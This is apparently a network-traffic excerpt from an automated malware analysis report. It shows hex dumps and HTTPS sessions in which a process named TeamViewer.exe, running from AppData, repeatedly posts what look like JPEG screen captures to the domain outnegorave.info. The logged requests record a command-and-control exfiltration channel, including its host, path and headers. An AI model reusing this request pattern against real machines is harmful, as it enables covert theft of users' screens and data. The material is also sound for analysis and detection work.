                                                                                                                      Data Raw: 17 24 11 04 00 94 03 ef 2e
                                                                                                                      Data Ascii: $.
                                                                                                                      Sep 15, 2021 14:08:02.376321077 CEST937INData Raw: 17 24 0a 20 00 14 03 ef 2e 80 00 00 00 73 00 00 00 01 00 00 00 14 80 00 00 1e 3f 81 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: $ .s?
                                                                                                                      Sep 15, 2021 14:08:02.377862930 CEST937INData Raw: 17 24 2e 38 00 23 05 01 04 00 00 00 02 00 00 00 02 04 00 00 00 0b 4a 4f 17 03 04 00 00 00 28 07 de 5d 04 10 00 00 00 04 00 00 00 0b 4a 4f 17 04 00 00 00 28 07 de 5d fe 01 00 00 00 03
                                                                                                                      Data Ascii: $.8#JO(]JO(]
                                                                                                                      Sep 15, 2021 14:08:02.770778894 CEST940INData Raw: 17 24 2e cf 04 26 14 01 04 00 00 00 01 00 00 00 02 04 00 00 00 00 00 00 00 03 04 00 00 00 00 00 00 00 08 02 00 00 00 00 00 14 02 00 00 00 00 00 15 01 00 00 00 00 16 02 00 00 00 00 00 17 04 00 00 00 03 00 00 00 18 02 00 00 00 00 00 19 01 00 00 00
                                                                                                                      Data Ascii: $.&0<html><head><HTA:APPLICATION ID="oHTA" ICON="http://www.teamviewer.com/fa
                                                                                                                      Sep 15, 2021 14:08:02.770806074 CEST940INData Raw: 17 24 2e d2 01 26 15 01 04 00 00 00 02 00 00 00 02 04 00 00 00 00 00 00 00 03 04 00 00 00 00 00 00 00 08 0c 01 00 00 a5 63 9a 7d d1 30 fc 30 c8 30 ca 30 fc 30 6e 30 66 8a 28 75 e9 30 a4 30 bb 30 f3 30 b9 30 4c 30 31 59 b9 52 57 30 7e 30 57 30 5f
                                                                                                                      Data Ascii: $.&c}00000n0f(u00000L01YRW0~0W0_00c}00000L0FU(uvvg0TeamViewer0O(uY004XT0J0[i0+T0c}00000n0D0Z00K0L0gRj0TeamViewer000000@bcW0f0D00_L0B0
                                                                                                                      Sep 15, 2021 14:08:02.770927906 CEST941INData Raw: 17 24 2e 22 03 26 15 01 04 00 00 00 03 00 00 00 02 04 00 00 00 00 00 00 00 03 04 00 00 00 00 00 00 00 08 a4 00 00 00 46 55 28 75 7f 4f 28 75 6e 30 91 75 44 30 5c 00 6e 00 5c 00 6e 00 53 30 6e 30 bd 30 d5 30 c8 30 a6 30 a7 30 a2 30 6f 30 46 55 28
                                                                                                                      Data Ascii: $."&FU(uO(un0uD0\n\nS0n0000000o0FU(utXg0O(uU00f0D000F0g0Y00!qe00000o0PNvj0(ug0W0K0O(ug0M0~0[000\n\n000k0_c0f0T0)R(uO0`0U0D00FU(uO(u
                                                                                                                      Sep 15, 2021 14:08:02.771090031 CEST942INData Raw: 17 24 2e 5a 03 26 15 01 04 00 00 00 04 00 00 00 02 04 00 00 00 00 00 00 00 03 04 00 00 00 00 00 00 00 08 de 00 00 00 46 55 28 75 7f 4f 28 75 4c 30 1c 69 fa 51 55 30 8c 30 7e 30 57 30 5f 30 5c 00 6e 00 5c 00 6e 00 53 30 6e 30 bd 30 d5 30 c8 30 a6
                                                                                                                      Data Ascii: $.Z&FU(uO(uL0iQU00~0W0_0\n\nS0n0000000o0FU(utXg0O(uU00f0D000F0g0Y00!qe00000o0PNvj0(ug0W0K0O(ug0M0~0[000\n\nS0n000000o05R_k0B}NW0~0Y00s0}o0S_>yn00000000
                                                                                                                      Sep 15, 2021 14:08:28.278345108 CEST1452INData Raw: 17 24 1b 00 00
                                                                                                                      Data Ascii: $
                                                                                                                      Sep 15, 2021 14:08:53.278769970 CEST5972INData Raw: 17 24 1b 00 00
                                                                                                                      Data Ascii: $
                                                                                                                      Sep 15, 2021 14:09:18.279109001 CEST6086INData Raw: 17 24 1b 00 00
                                                                                                                      Data Ascii: $
                                                                                                                      Sep 15, 2021 14:09:43.279575109 CEST6087INData Raw: 17 24 1b 00 00
                                                                                                                      Data Ascii: $


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      0192.168.2.649758172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      2021-09-15 12:08:03 UTC0OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 87812
                                                                                                                      Content-Type: multipart/form-data; boundary=--------2771230636
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2021-09-15 12:08:03 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 37 31 32 33 30 36 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------2771230636Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                      2021-09-15 12:08:03 UTC0OUTData Raw: b3 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 e6 af 4a 6b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 79 0b 3b 85 19 5a 1e 56 7d e2 9e 04 9a ec a4 7b 68 07 48 47 6c fb 65 62 4f f6 d5 8b 9a f7 cd c9 c4 1a a0 86 08 4a 0b d5 08 f4 be 62 08 d6 15 e7 ce 36 99 fc 4a d9 1a af a3 d2 9e 3b e2 b9 24 26 9c c4 65 1f a7 f4 c8 59 9d b6 d1 6d a8 b8 c6 f0 2d fc 05 23 22 ba b8
                                                                                                                      Data Ascii: .(&<c&(yPNJk^y;ZV}{hHGlebOJb6J;$&eYm-#"
                                                                                                                      2021-09-15 12:08:03 UTC0OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                      2021-09-15 12:08:03 UTC16OUTData Raw: 45 14 00 b4 94 b4 50 02 51 8a 51 45 00 47 4b 40 ab 5a 7d b2 5c ce c9 21 60 02 e7 e5 fa 8a 23 17 27 64 12 92 8a bb 2a 8a 5a d9 fe c8 b7 fe fc bf 98 ff 00 0a 3f b2 6d ff 00 bf 2f e6 3f c2 b6 fa ad 43 0f ad 53 31 a8 ad af ec 9b 7f ef cb f9 8f f0 a3 fb 26 df fb f2 fe 63 fc 29 fd 5a a0 7d 6a 99 8b 46 2b 67 fb 26 df fb f2 fe 63 fc 2a b5 fd 8c 56 d0 2b c6 ce 49 6c 7c c4 7a 1a 99 61 e7 15 76 54 71 10 93 b2 33 b1 46 29 68 35 81 b8 da 29 68 a0 04 a2 96 8c 52 b0 09 45 2e 29 31 45 86 14 51 8a 28 b0 05 14 51 40 05 2d 25 68 e9 da 1e a9 aa 42 d2 e9 f6 6f 3a 23 6d 62 a4 70 7a fa d0 dd b7 0b 5c cf a4 ad cf f8 44 3c 43 ff 00 40 a9 ff 00 4f f1 a3 fe 11 0f 10 ff 00 d0 2a 7f d3 fc 68 e6 8f 71 f2 be c6 1d 15 7b 50 d1 f5 1d 31 43 5f 5a 49 08 63 80 5b 1d 7a e3 8f ad 52 a6 9d c4
                                                                                                                      Data Ascii: EPQQEGK@Z}\!`#'d*Z?m/?CS1&c)Z}jF+g&c*V+Il|zavTq3F)h5)hRE.)1EQ(Q@-%hBo:#mbpz\D<C@O*hq{P1C_ZIc[zR
                                                                                                                      2021-09-15 12:08:03 UTC32OUTData Raw: da 0a 28 a2 80 0a 28 a5 44 79 1c 24 6a cc c7 a0 51 92 69 80 94 53 a4 8e 48 9f 64 a8 c8 c3 b3 0c 1a 6d 00 14 51 45 20 0a 28 a2 80 0a 28 a2 98 05 14 51 40 05 14 51 40 05 2d 25 28 a0 02 8a 28 a0 41 4b 49 4b 4c 02 96 92 94 50 02 d2 8a 05 2d 52 44 b6 2e 28 c5 2d 14 ec 48 d3 4d a7 1a 43 49 94 84 a2 8a 29 00 51 45 14 00 b4 b4 94 53 01 68 a2 92 81 0b de 96 92 96 80 0a 28 a2 98 0b 45 25 14 00 51 45 14 c0 51 4b 49 4b 40 82 8a 28 a0 05 a2 8a 29 88 29 68 a2 98 85 a5 14 94 b4 c4 2d 14 94 50 03 85 2d 34 52 d3 24 5a 5a 4a 5a 60 28 a5 cd 36 96 9a 13 1d 4b 4d 14 a2 a9 12 c7 52 d3 69 69 88 75 14 94 53 10 e0 69 c0 d3 29 45 3b 89 a1 d4 b4 da 75 34 48 a2 96 93 34 53 10 ea 75 33 34 a0 d3 42 68 75 19 a4 cd 14 c4 38 1a 76 69 94 b5 49 89 a1 f9 a2 9b 4b 9a 77 26 c3 c1 a5 cd 32 96
                                                                                                                      Data Ascii: ((Dy$jQiSHdmQE ((Q@Q@-%((AKIKLP-RD.(-HMCI)QESh(E%QEQKIK@())h-P-4R$ZZJZ`(6KMRiiuSi)E;u4H4Su34Bhu8viIKw&2
                                                                                                                      2021-09-15 12:08:03 UTC48OUTData Raw: 1f e0 44 62 bf 88 c4 cd 2d 25 1f 4a dc e6 17 34 52 52 f3 40 21 41 a7 0a 6e 29 c2 a4 b4 2d 38 53 29 e2 93 29 0b 45 14 52 29 0e 14 e1 4d 1c 53 80 a9 65 a1 c2 9c 29 00 a7 62 a5 9a 21 69 69 31 4a 05 26 52 1c 29 c2 9a 05 38 54 32 90 e1 4e cd 30 53 c5 26 5a 14 53 a9 a2 9d 52 ca 43 85 70 de 34 00 5c 5b 63 fb ad fc eb b8 1d eb 86 f1 a7 fc 7c db ff 00 b8 df ce aa 96 e2 99 c2 52 6d 06 9d 8a 2b 1b 1d 77 1b b1 68 d8 be 94 ea 28 b2 0b b1 62 2d 0c a9 2c 2e f1 c8 87 72 ba 1c 15 3e a0 8a 59 19 e6 95 e5 9e 47 96 47 39 67 76 24 b1 f5 24 f5 a4 a2 8b 20 bb 1a 23 51 da 94 22 fa 52 d2 d3 b2 15 d8 52 d2 52 d3 10 d2 8a dc 91 41 8d 48 c6 29 d4 51 64 17 63 3c a5 f4 a5 d8 be 94 fa 4a 39 50 5d 8d f2 d7 39 c5 01 14 74 14 ea 28 b2 0b b1 02 80 30 3a 52 04 50 72 29 d4 51 60 b8 b4 dd a3
                                                                                                                      Data Ascii: Db-%J4RR@!An)-8S))ER)MSe)b!ii1J&R)8T2N0S&ZSRCp4\[c|Rm+wh(b-,.r>YGG9gv$$ #Q"RRRAH)Qdc<J9P]9t(0:RPr)Q`
                                                                                                                      2021-09-15 12:08:03 UTC64OUTData Raw: 45 31 0b 45 14 50 21 68 cd 20 a5 a6 02 d1 49 4b 40 0b 45 25 2d 31 0b 45 25 2d 02 16 94 52 52 d3 10 51 49 4b 4c 05 a5 a6 d2 d0 21 c2 8a 4a 5a a1 0a 29 69 b9 a5 a6 21 d9 a5 a6 d2 d0 21 c2 94 53 69 41 aa 4c 96 48 28 a4 06 8a a4 48 b4 b4 94 66 98 58 5c d1 9a 41 4b 45 c5 61 45 2e 69 94 b9 a7 70 b0 fc d2 d3 33 4b 9a 64 d8 70 a5 cd 37 34 53 b8 58 7e 68 cd 37 34 6e f6 a2 e2 b1 20 34 b9 a8 f7 1f 5a 33 ef 4e e2 b1 26 45 19 a8 f3 4b 9a 2e 2b 0f cd 19 a6 e6 8c d3 b8 58 75 2e 69 b4 66 8b 8a c3 b3 4b 9a 66 68 cd 3b 85 87 e6 8c d3 37 52 6e a2 e1 ca 49 9a 33 51 ee a3 75 2b 87 29 26 ea 4d d5 11 7a 69 7a 1c 86 a0 4c 5a 9a 5e a2 2f 4d 2d 52 e6 52 81 29 7a 61 7a 8c b5 30 b5 43 91 6a 04 85 fd e9 85 a9 85 a9 85 aa 1c 8d 14 47 96 a6 16 a6 96 a6 16 ac dc 8d 14 47 13 4c 26 90 9a
                                                                                                                      Data Ascii: E1EP!h IK@E%-1E%-RRQIKL!JZ)i!!SiALH(HfX\AKEaE.ip3Kdp74SX~h74n 4Z3N&EK.+Xu.ifKfh;7RnI3Qu+)&MzizLZ^/M-RR)zaz0CjGGL&
                                                                                                                      2021-09-15 12:08:03 UTC80OUTData Raw: 69 e4 1c 87 ce f8 a5 af a1 fe cf 07 fc f1 8f fe f9 14 7d 9e 0f f9 e3 1f fd f2 28 f6 9e 41 c8 7c ef 45 7d 11 f6 78 3f e7 8c 7f f7 c8 a3 ec f0 7f cf 18 ff 00 ef 91 47 38 72 1f 3b d1 5f 44 7d 9e 0f f9 e3 1f fd f2 28 fb 3c 1f f3 c6 3f fb e4 51 ce 1c 87 cf 14 95 f4 47 d9 e0 ff 00 9e 31 ff 00 df 22 8f b3 c1 ff 00 3c 63 ff 00 be 45 1e d0 39 0f 9d f1 46 2b e8 8f 22 1f f9 e3 1f fd f2 28 f2 21 ff 00 9e 31 ff 00 df 22 8f 69 e4 1c 87 ce f8 a3 15 f4 47 91 0f fc f1 8f fe f9 14 79 10 ff 00 cf 18 ff 00 ef 91 47 b4 f2 0e 43 e7 7c 52 e2 be 87 f2 21 ff 00 9e 31 ff 00 df 22 be 75 a6 a6 1c a3 f1 46 29 94 51 ce 2e 51 f8 a2 99 45 1c e1 ca 48 29 6a 2a 29 f3 87 21 2d 15 15 14 7b 41 72 12 d1 51 51 47 b4 0e 42 5a 2a 2a 28 f6 81 c8 4d 45 43 45 1e d0 39 09 a8 a8 68 a3 da 07 21 35 15
                                                                                                                      Data Ascii: i}(A|E}x?G8r;_D}(<?QG1"<cE9F+"(!1"iGyGC|R!1"uF)Q.QEH)j*)!-{ArQQGBZ**(MECE9h!5
                                                                                                                      2021-09-15 12:08:03 UTC85OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 37 31 32 33 30 36 33 36 2d 2d 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------2771230636--
                                                                                                                      2021-09-15 12:08:04 UTC85INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:08:04 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=ddccde455271131aa0b714df2720e21d55a3a6bfbd1d37b175bcd503cf90f9d2; expires=Thu, 15-Sep-2022 12:08:03 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9Uk4xUJSb82XHn%2BPd%2F2ObLeDWOCSDzYadeWCDROZejiDEgioYH3EqGxaJu8nj7SulPtttBGoqnBjd3bO0OvJZ736Z1BhiKzS3hPTQfhQGOWcZpDpJwKD5KFx4J1VzEbygQta"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 68f1bcfe6d7f4ec1-FRA
                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                      2021-09-15 12:08:04 UTC86INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                      Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      1192.168.2.649834172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      2021-09-15 12:09:06 UTC86OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                      Content-Length: 90555
                                                                                                                      Content-Type: multipart/form-data; boundary=--------2341619378
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                      Host: outnegorave.info
                                                                                                                      Connection: Close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2021-09-15 12:09:06 UTC87OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 33 34 31 36 31 39 33 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------2341619378Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                      2021-09-15 12:09:06 UTC87OUTData Raw: b3 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 e6 af 4a 6b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 36 3e 3b 85 19 5a 1e 56 7d e2 9e 04 9a ec a4 7b 68 07 48 47 6c fb 65 62 4f f6 d5 8b 9a f7 cd c9 c4 1a a0 86 08 4a 0b d5 08 f4 be 62 08 d6 15 e7 ce 36 99 fc 4a d9 1a af a3 d2 9e 3b e2 b9 24 26 9c c4 65 1f a7 f4 c8 59 9d b6 d1 6d a8 b8 c6 f0 2d fc 05 23 22 ba b8
                                                                                                                      Data Ascii: .(&<c&(yPNJk^6>;ZV}{hHGlebOJb6J;$&eYm-#"
                                                                                                                      2021-09-15 12:09:06 UTC87OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                      2021-09-15 12:09:06 UTC103OUTData Raw: 45 14 00 b4 94 b4 50 02 51 8a 51 45 00 47 4b 5a ee 90 21 0a 2d a2 3f 2a 9c 90 7b 80 7d 69 f6 f1 5b cb 21 56 b6 88 00 33 c6 7f c6 94 62 e4 ec 82 52 51 57 66 28 a5 ae 8b ec 76 bf f3 ee 9f ad 1f 63 b5 ff 00 9f 74 fd 6b 7f ab 54 30 fa d5 33 9d a2 ba 2f b1 da ff 00 cf ba 7e b4 7d 8e d7 fe 7d d3 f5 a3 ea d5 03 eb 54 ce 76 8c 57 45 f6 3b 5f f9 f7 4f d6 a2 b8 b7 b6 8a 30 cb 6d 19 39 c7 39 ff 00 1a 52 a1 38 ab b2 a3 88 84 9d 91 83 8a 31 5a d8 87 fe 7d a1 fc 8f f8 d5 1b e4 58 ef 25 44 00 2a b6 00 15 81 bd ca d4 52 d1 40 09 45 2d 18 a5 60 12 8a 5c 52 62 8b 0c 28 a3 14 51 60 0a 28 a2 80 0a 5a 4a d1 d3 b4 3d 53 54 85 a5 d3 ec de 74 46 da c5 48 e0 f5 f5 a1 bb 6e 16 b9 9f 49 5b 9f f0 88 78 87 fe 81 53 fe 9f e3 47 fc 22 1e 21 ff 00 a0 54 ff 00 a7 f8 d1 cd 1e e3 e5 7d 8c
                                                                                                                      Data Ascii: EPQQEGKZ!-?*{}i[!V3bRQWf(vctkT03/~}}TvWE;_O0m99R81Z}X%D*R@E-`\Rb(Q`(ZJ=STtFHnI[xSG"!T}
                                                                                                                      2021-09-15 12:09:06 UTC119OUTData Raw: 8a ce 15 7e c8 f2 2b 1a ab dd 36 c3 bf 7c eb 54 e3 4d 27 fd 9a f3 eb bf f5 8d f5 ae f7 38 d2 58 ff 00 b3 5c 05 d1 fd e3 7d 6b 97 01 bc 8f 4f 30 7f 01 d4 5b 7f c8 ab 1f f9 ef 59 0f 5a d0 1f f8 a5 22 ff 00 3d eb 19 d8 e6 aa 82 d6 5e a6 18 c7 a4 7d 06 31 23 a1 a0 3b 0e 8c 69 33 9a 4a eb b1 e6 73 32 41 3b 8e f9 a7 79 e0 fd e4 06 a1 a2 97 2a 29 4d a2 53 e4 37 de 4c 52 1b 68 1b a1 c5 47 45 16 7d 18 d5 57 d4 1b 4f 53 f7 58 54 4d a7 c8 3a 73 53 64 f5 06 a4 59 1c 7f 11 a2 f2 45 a9 a3 3d ad 65 5e aa 6a 33 1b 0e a0 d6 c0 95 bb 81 4e dc 87 ef 20 34 fd a3 5d 0d 16 bd 4c 32 08 ec 69 2b 6c c3 6e fd 57 14 c3 61 0b 7d d6 c5 3f 6a 87 66 63 d1 5a 6d a5 9f e1 60 6a 17 d3 e6 5e 8b 9a 6a a4 7b 85 99 4e 8a 99 ad a5 5e a8 7f 2a 88 a3 0e a0 d5 a6 98 84 a2 8c 51 4c 02 96 92 8a 04
                                                                                                                      Data Ascii: ~+6|TM'8X\}kO0[YZ"=^}1#;i3Js2A;y*)MS7LRhGE}WOSXTM:sSdYE=e^j3N 4]L2i+lnWa}?jfcZm`j^j{N^*QL
                                                                                                                      2021-09-15 12:09:06 UTC135OUTData Raw: ff 00 70 d4 0d f7 8f d6 a6 d2 bf e3 e1 bf dc 35 09 fb c7 eb 59 af 8d 84 fe 14 25 2d 25 28 ad 0c 85 a5 a4 a5 a4 20 a5 a4 a5 a4 20 a2 8a 28 10 52 d2 52 d2 00 a2 8a 5a 00 4a 5c 52 d1 40 84 a5 a2 96 90 5c 00 ab 76 31 e6 50 7d ea ba 29 6a d2 d3 e3 fd ea 8f 7a c6 ac ad 16 74 61 a1 cd 34 49 e3 15 ff 00 45 b6 f6 15 c8 db 2f fa 64 3f ef af f3 ae d3 c6 09 fe 89 09 f4 ae 3a d4 7f a6 c3 fe fa ff 00 3a cb 0c ff 00 70 7a 35 f4 af 63 b6 d7 3f e3 e2 3f f7 2b 28 9a d5 d7 3f e3 e5 3f dc ac a3 59 e1 fe 04 46 2b f8 8c 4c d2 d2 51 f4 ad ce 61 73 45 25 2f 34 02 14 1a 70 a6 e2 9c 2a 4b 42 d3 85 32 9e 29 32 90 b4 51 45 22 90 e1 4e 14 d1 c5 38 0a 96 5a 1c 29 c2 90 0a 76 2a 59 a2 16 96 93 14 a0 52 65 21 c2 9c 29 a0 53 85 43 29 0e 14 ec d3 05 3c 52 65 a1 45 3a 9a 29 d5 2c a4 38 57
                                                                                                                      Data Ascii: p5Y%-%( (RRZJ\R@\v1P})jzta4IE/d?::pz5c??+(??YF+LQasE%/4p*KB2)2QE"N8Z)v*YRe!)SC)<ReE:),8W
                                                                                                                      2021-09-15 12:09:06 UTC151OUTData Raw: 51 88 92 64 9f 60 75 03 0b bd 76 9c 90 30 38 61 c0 fc 6b 3e 8a 8f 66 8a e7 65 8b eb c6 bc 9e 19 84 7e 53 43 04 51 0f 9b 39 d8 a1 73 d3 be 33 5a 8f e2 69 5b 53 bb bc 5b 35 51 71 6c 61 58 fc c3 88 db ae f1 c7 5d c5 8e 3d eb 0e 8a 1c 13 dc 14 da 2c 43 78 d1 69 17 3a 78 42 56 e2 48 e4 dd bb 85 d9 bb b7 7c ee fd 2a fd 8e b5 06 9d 1a 2d 9d 84 a0 99 e1 9a 61 25 c6 e5 63 19 cf c8 36 8d b9 3d c9 6c 0e 2b 22 8a 7c 88 39 99 72 f7 51 37 f0 c7 f6 88 73 73 19 2a b3 87 e4 c7 d9 58 63 92 3b 1c f4 e3 d3 15 29 29 69 c6 2a 2a c8 52 93 7a b0 ad 1d 3b 50 b5 b4 b3 bb b7 9e d2 e2 46 b9 01 1a 58 6e 16 32 10 72 57 94 6e 09 c6 7e 83 df 39 d4 53 6a ea c2 4e ce e6 8a df 58 9b 7f b2 4d 61 70 f6 b1 c8 64 83 6d c8 59 63 24 00 c0 b6 c2 18 1c 03 f7 47 d6 ac 5e 6a f6 32 c9 b2 3b 49 a5 b4
                                                                                                                      Data Ascii: Qd`uv08ak>fe~SCQ9s3Zi[S[5QqlaX]=,Cxi:xBVH|*-a%c6=l+"|9rQ7ss*Xc;))i**Rz;PFXn2rWn~9SjNXMapdmYc$G^j2;I
                                                                                                                      2021-09-15 12:09:06 UTC167OUTData Raw: 75 a9 69 fb 61 96 20 c3 7c ca ca b2 aa ee 00 ee 65 07 b6 4e ec 0e b4 fd 12 de 6b 67 d3 2c 2f e0 9b ed 7f e9 8c b6 df 76 55 8c c2 78 c1 04 ae 58 1c 64 7b e3 9a e3 f6 8f 4a 4d a2 93 83 b5 86 a5 fd 7e 07 60 d1 49 1f 97 67 6e b2 5a 5f 3e 9a d1 5a db 4e c3 ce 89 8c b9 2a 5b 8f 99 94 b6 38 1c 1c 01 ce 4e 66 97 63 7d 0d d3 e8 f7 d0 4b 03 6a 10 34 71 47 38 28 43 e4 32 1c 1e 46 59 40 cd 61 6d 14 6d 14 28 0b 98 eb ed ae ad 45 f5 c1 95 d7 ec 76 da 8d a4 28 cd f7 42 a2 4a a0 9f 6c 8c 9f c6 a9 45 63 aa 59 5a ea f7 5a c4 37 0b 04 d1 15 69 26 ce 26 94 b0 28 54 ff 00 19 c8 27 23 3c 67 d6 b9 dd a3 d2 a5 b7 b8 b8 b5 2e 6d 6e 26 84 c8 a5 1f cb 72 bb 94 f5 07 1d 47 b5 0a 2d 6a 3e 65 73 a3 d7 63 96 0b 7f 10 49 32 34 69 75 a9 af 90 58 60 49 b4 cb bb 6f ae 32 33 f5 ac 8f 0f 7f
                                                                                                                      Data Ascii: uia |eNkg,/vUxXd{JM~`IgnZ_>ZN*[8Nfc}Kj4qG8(C2FY@amm(Ev(BJlEcYZZ7i&&(T'#<g.mn&rG-j>escI24iuX`Io23
                                                                                                                      2021-09-15 12:09:06 UTC175OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 33 34 31 36 31 39 33 37 38 2d 2d 0d 0a 0d 0a
                                                                                                                      Data Ascii: ----------2341619378--
                                                                                                                      2021-09-15 12:09:08 UTC175INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 15 Sep 2021 12:09:08 GMT
                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                      Content-Length: 48
                                                                                                                      Connection: close
                                                                                                                      x-powered-by: PHP/5.6.40
                                                                                                                      set-cookie: X-Csrf-Token=1ff005bf053274c8a139f292716a4c6a768fa2a22f3e2fadac5c81cd183e83b3; expires=Thu, 15-Sep-2022 12:09:06 GMT; Max-Age=31536000; httponly
                                                                                                                      CF-Cache-Status: DYNAMIC
